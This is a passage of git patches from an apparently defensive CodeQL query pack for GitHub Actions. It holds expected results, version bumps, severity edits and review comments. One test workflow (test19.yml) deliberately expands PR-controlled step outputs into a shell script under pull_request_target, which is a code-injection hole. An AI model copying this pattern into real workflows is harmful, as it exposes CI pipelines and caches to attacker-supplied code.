.github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| 
.github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | From d13a937a5ddaa49ddd37043263fc77141694f957 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:30:43 +0200 Subject: [PATCH 322/707] Update Cache Poisoning --- .../CWE-349/.github/workflows/test19.yml | 42 +++++++++++++++++++ .../CachePoisoningByCodeInjection.expected | 13 ++++++ 2 files changed, 55 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml new file mode 100644 index 000000000000..1f0e7291442c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml 
@@ -0,0 +1,42 @@
+name: Close Translation Pull Requests
+
+on:
+ pull_request_target:
+ branches: [ master, main, dev ]
+
+jobs:
+
+ close-translation-prs:
+
+ name: Close Translation Pull Requests
+ runs-on: ubuntu-latest
+
+ steps:
+ - name: Get changed files
+ id: modified_files
+ uses: trilom/file-changes-action@v1.2.4
+ with:
+ output: ","
+
+ - name: Check the PR for translations
+ id: check
+ run: |
+ shopt -s nocasematch
+ if [[ "${{ steps.modified_files.outputs.files_modified }}" == *"en_gb/strings.po"* ]]; then
+ echo "Found modified en_gb, likely a valid PR"
+ unset CLOSE
+ elif [[ "${{ steps.modified_files.outputs.files_modified }}" == *"strings.po"* ]]; then
+ echo "Found modified strings.po, unwanted."
+ CLOSE="true"
+ elif [[ "${{ steps.modified_files.outputs.files_added }}" == *"strings.po"* ]]; then
+ echo "Found added strings.po, unwanted."
+ CLOSE="true"
+ elif [[ "${{ steps.modified_files.outputs.files_removed }}" == *"strings.po"* ]]; then
+ echo "Found removed strings.po, unwanted."
+ CLOSE="true"
+ else
+ echo "No strings.po were modified or added, not a translation."
+ unset CLOSE
+ fi
+ echo ::set-output name=close::${CLOSE}
+
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected
index 60c25e1cd92a..e0a5e8fd4b1b 100644
--- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected
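Review bot: The new fixture carries no comment saying it is intentionally vulnerable, so a reader cannot tell the `${{ steps.modified_files.outputs.files_modified }}` expansions inside `run:` (and the `files_added` / `files_removed` ones below them) from an oversight. The outputs come from a third-party action executed under `pull_request_target`, and the expected file added in the same commit treats that step as the taint source, so presumably the file lists reflect PR-controlled names; the safe form would pass each output through `env:` and read it as a quoted shell variable, which is exactly what this fixture must not do. A header such as `# Test fixture: step outputs of a PR-triggered action are expanded directly into a run script under pull_request_target — intentionally vulnerable; expected finding: CachePoisoningByCodeInjection` would make that explicit. Separately, `echo ::set-output` is a deprecated workflow command (GitHub replaced it with writes to $GITHUB_OUTPUT); keeping it is fine if the fixture is meant to mirror real-world workflows, but say so in the same comment.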
@@ -1,7 +1,20 @@ edges +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | provenance | | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | provenance | | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | provenance | | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | provenance | | nodes | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/test10.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files | +| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | +| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | +| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | semmle.label | steps.modified_files.outputs.files_added | +| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | semmle.label | steps.modified_files.outputs.files_removed | subpaths #select | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. 
| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | +| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | +| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | ${{ steps.modified_files.outputs.files_added }} | +| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | ${{ steps.modified_files.outputs.files_removed }} | 
From 49a2fd82b1473eaeb6b820ed57c90e58db24b332 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 6 Jun 2024 17:32:11 +0200
Subject: [PATCH 323/707] Bump qlpack versions
---
ql/lib/qlpack.yml | 2 +-
ql/src/qlpack.yml | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 48045dbf6792..9e87409504da 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
-version: 0.0.33
+version: 0.0.34
 dependencies:
 codeql/util: ^1.0.0
 codeql/yaml: ^1.0.0
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 2f79bddd77e5..343bd9d6a227 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: githubsecuritylab/actions-queries
-version: 0.0.33
+version: 0.0.34
 groups:
 - actions
 - queries
From c45d4d37aa46a5af27b9016a9cc6366d89838c5d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 6 Jun 2024 17:34:42 +0200
Subject: [PATCH 324/707] Bump qlpack versions
---
ql/lib/qlpack.yml | 2 +-
ql/src/qlpack.yml | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 9e87409504da..1999bd326a14 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
-version: 0.0.34
+version: 0.0.35
 dependencies:
 codeql/util: ^1.0.0
 codeql/yaml: ^1.0.0
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 343bd9d6a227..bd34a5c91250 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: githubsecuritylab/actions-queries
-version: 0.0.34
+version: 0.0.35
 groups:
 - actions
 - queries
From 3f0f75a7c5787eb6a4c7bd42a2ff85a2d8e0808f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 7 Jun 2024 10:05:39 +0200
Subject: [PATCH 325/707] Make CachePoisoning queries high severity
---
ql/src/Security/CWE-349/CachePoisoning.ql | 2 +-
ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql
index a6dc7e14fdd4..feef43164614 100644
--- a/ql/src/Security/CWE-349/CachePoisoning.ql
+++ b/ql/src/Security/CWE-349/CachePoisoning.ql
@@ -4,7 +4,7 @@
 * @kind problem
 * @problem.severity error
 * @precision high
- * @security-severity 9.3
+ * @security-severity 7.5
 * @id actions/cache-poisoning
 * @tags actions
 * security
diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql
index 8fdebdbde188..030dd872cb28 100644
--- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql
+++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql
@@ -4,7 +4,7 @@
 * @kind path-problem
 * @problem.severity error
 * @precision high
- * @security-severity 9.3
+ * @security-severity 7.5
 * @id actions/cache-poisoning/code-injection
 * @tags actions
 * security
From 92cd50393b485895391a61aadc7ba2053d76ddc3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 7 Jun 2024 10:06:46 +0200
Subject: [PATCH 326/707] Bump qlpack versions
---
ql/lib/qlpack.yml | 2 +-
ql/src/qlpack.yml | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 1999bd326a14..5cfa47a5cdf6 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
-version: 0.0.35
+version: 0.0.36
 dependencies:
 codeql/util: ^1.0.0
 codeql/yaml: ^1.0.0
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index bd34a5c91250..65bb672183fe 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
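Review bot: The `@security-severity` change from 9.3 to 7.5 in CachePoisoning.ql, and the identical change in CachePoisoningByCodeInjection.ql, carries no rationale anywhere in the commit, and the subject line "Make CachePoisoning queries high severity" only reads correctly if one knows that CodeQL maps scores of 9.0 and above to critical and 7.0–8.9 to high. A one-line note in each query's QLDoc, or a changelog entry for the pack, stating why the score was lowered would keep the rating auditable when someone later asks why a cache-poisoning finding no longer surfaces as critical. The unchanged `@problem.severity error` line is consistent with the new band, so no further metadata edit seems needed. The enclosing QLDoc comment begins before the hunk.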
@@ -1,7 +1,7 @@
 ---
 library: false
 name: githubsecuritylab/actions-queries
-version: 0.0.35
+version: 0.0.36
 groups:
 - actions
 - queries
From ad1f35c86a7f7b957346747be585b5acf9431e05 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 18:13:01 +0200 Subject: [PATCH 327/707] Move from yaml to js extractor --- .!79690!.DS_Store | 0 ql/lib/codeql-pack.lock.yml | 12 ++- .../codeql/actions/dataflow/ExternalFlow.qll | 18 ++--- .../internal/ExternalFlowExtensions.qll | 6 +- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ...rSource_sonarcloud-github-action.model.yml | 2 +- ql/lib/ext/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 2 +- ql/lib/ext/anchore_scan-action.model.yml | 2 +- .../ext/andresz1_size-limit-action.model.yml | 2 +- .../android-actions_setup-android.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 2 +- .../aszc_change-string-case-action.model.yml | 2 +- ...ctions_configure-aws-credentials.model.yml | 2 +- .../axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 4 +- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 +- .../ext/bufbuild_buf-setup-action.model.yml | 2 +- ql/lib/ext/cachix_cachix-action.model.yml | 4 +- ql/lib/ext/changesets_action.model.yml | 2 +- .../ext/cloudflare_wrangler-action.model.yml | 2 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- 
.../ext/dailydotdev_action-devcard.model.yml | 2 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 2 +- .../dawidd6_action-ansible-playbook.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 2 +- ...er-practice_actions-setup-docker.model.yml | 2 +- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 2 +- ql/lib/ext/expo_expo-github-action.model.yml | 2 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-builder.model.yml | 2 +- .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- ...ctions_actions-runner-controller.model.yml | 2 +- .../composite-actions/adap_flower.model.yml | 2 +- .../agoric_agoric-sdk.model.yml | 2 +- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../amazon-ion_ion-java.model.yml | 2 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 2 +- .../ansible_ansible-lint.model.yml | 2 +- .../composite-actions/ansible_awx.model.yml | 2 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 2 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 2 +- .../composite-actions/apache_camel.model.yml | 2 +- .../composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../composite-actions/apache_nuttx.model.yml | 2 +- .../apache_opendal.model.yml | 2 +- .../composite-actions/apache_pekko.model.yml | 2 +- 
.../apache_pulsar-helm-chart.model.yml | 2 +- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 2 +- .../aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 2 +- .../auth0_auth0-java.model.yml | 2 +- .../auth0_auth0.net.model.yml | 2 +- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 2 +- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- ...ertools_powertools-lambda-python.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../azure_azure-datafactory.model.yml | 2 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 2 +- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../broadinstitute_gatk.model.yml | 2 +- .../canonical_multipass.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../chocobozzz_peertube.model.yml | 2 +- .../cilium_cilium-cli.model.yml | 2 +- .../composite-actions/cilium_cilium.model.yml | 2 +- .../citusdata_citus.model.yml | 2 +- .../clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 2 +- 
.../conan-io_conan-center-index.model.yml | 2 +- .../corretto_corretto-8.model.yml | 2 +- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 2 +- .../composite-actions/d2l-ai_d2l-en.model.yml | 2 +- ...build-check-deploy-gradle-action.model.yml | 2 +- .../datadog_dd-trace-dotnet.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-js.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../davatorium_rofi.model.yml | 2 +- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 2 +- .../diggerhq_digger.model.yml | 2 +- .../diku-dk_futhark.model.yml | 2 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 2 +- .../drawpile_drawpile.model.yml | 2 +- .../eksctl-io_eksctl.model.yml | 2 +- .../elastic_apm-agent-dotnet.model.yml | 2 +- .../elastic_apm-agent-java.model.yml | 2 +- .../elastic_apm-server.model copy.yml | 2 +- .../elementor_elementor.model.yml | 2 +- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 2 +- .../eonasdan_tempus-dominus.model.yml | 2 +- .../composite-actions/erlang_otp.model.yml | 2 +- .../esphome_esphome.model.yml | 2 +- .../composite-actions/expensify_app.model.yml | 2 +- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 2 +- 
.../facebookresearch_xformers.model.yml | 2 +- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 2 +- .../firebase_firebase-ios-sdk.model.yml | 2 +- .../flagsmith_flagsmith.model.yml | 2 +- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 2 +- .../composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 2 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../composite-actions/gaphor_gaphor.model.yml | 2 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 2 +- .../composite-actions/github_ruby.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- .../go-spatial_tegola.model.yml | 2 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 2 +- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 4 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../home-assistant_android.model.yml | 2 +- .../homebrew_actions.model.yml | 2 +- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../igniterealtime_openfire.model.yml | 2 +- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 2 +- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../ionic-team_ionicons.model.yml | 2 +- .../ionic-team_stencil.model.yml | 2 +- .../composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- 
.../jhipster_generator-jhipster.model.yml | 4 +- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../keycloak_keycloak.model.yml | 2 +- .../composite-actions/kserve_kserve.model.yml | 2 +- .../kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 2 +- .../kyverno_kyverno.model.yml | 2 +- .../composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../ldc-developers_ldc.model.yml | 2 +- .../ledgerhq_ledger-live.model.yml | 2 +- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 2 +- .../libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../lightning-ai_torchmetrics.model.yml | 2 +- .../linkerd_linkerd2.model.yml | 4 +- .../logseq_publish-spa.model.yml | 2 +- .../macvim-dev_macvim.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- .../maplibre_maplibre-native.model.yml | 2 +- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 2 +- .../mdanalysis_mdanalysis.model.yml | 2 +- .../medic_cht-core.model.yml | 2 +- .../medusajs_medusa.model.yml | 2 +- .../metabase_metabase.model.yml | 2 +- ...etamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 2 +- .../composite-actions/microsoft_wsl.model.yml | 2 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 2 +- .../mozilla_addons-server.model.yml | 2 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- 
.../mumble-voip_mumble.model.yml | 2 +- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 2 +- ..._optic-release-automation-action.model.yml | 2 +- .../composite-actions/nektos_act.model.yml | 2 +- ...4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 2 +- .../composite-actions/novuhq_novu.model.yml | 4 +- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 2 +- .../composite-actions/ocaml_dune.model.yml | 2 +- .../oneflow-inc_oneflow.model.yml | 2 +- ...metry_opentelemetry-ruby-contrib.model.yml | 2 +- ...pen-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- ...enzeppelin-contracts-upgradeable.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts.model.yml | 2 +- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 2 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 2 +- .../owntracks_android.model.yml | 2 +- .../pandas-dev_pandas.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- .../phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 +- .../composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 2 +- 
